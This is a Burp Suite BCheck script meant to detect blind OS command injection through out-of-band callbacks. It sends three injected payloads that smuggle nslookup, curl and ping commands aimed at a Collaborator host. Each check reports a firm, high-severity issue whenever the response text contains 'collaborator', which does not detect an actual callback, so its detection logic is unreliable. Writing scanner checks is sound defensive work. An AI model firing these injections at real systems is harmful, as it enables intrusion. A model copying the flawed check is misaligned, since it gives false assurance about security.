metadata:
    language: v2-beta
    name: "OS Command Injection - Blind Out-of-Band Detection"
    description: "Tests for blind command injection using Burp Collaborator out-of-band callbacks. Time-based detection is not supported in BChecks."
    author: "BCheck Arsenal"
    tags: "cmdi", "blind", "oob", "collaborator"

given insertion point then
    send payload called oobCheck:
        replacing: "`nslookup {generate_collaborator_address}`"

    if {oobCheck.response} matches "collaborator" then
        report issue:
            severity: high
            confidence: firm
            detail: "Blind OS command injection detected via nslookup DNS callback to Burp Collaborator."
            remediation: "Never execute user input as system commands. Use language-native APIs instead of shell commands."
    end if

    send payload called oobCheck2:
        replacing: ";curl {generate_collaborator_address}"

    if {oobCheck2.response} matches "collaborator" then
        report issue:
            severity: high
            confidence: firm
            detail: "Blind OS command injection detected via curl HTTP callback to Burp Collaborator."
            remediation: "Never execute user input as system commands. Use language-native APIs instead of shell commands."
    end if

    send payload called oobCheck3:
        replacing: "|ping -c 1 {generate_collaborator_address}"

    if {oobCheck3.response} matches "collaborator" then
        report issue:
            severity: high
            confidence: firm
            detail: "Blind OS command injection detected via ping callback to Burp Collaborator."
            remediation: "Never execute user input as system commands. Use language-native APIs instead of shell commands."
    end if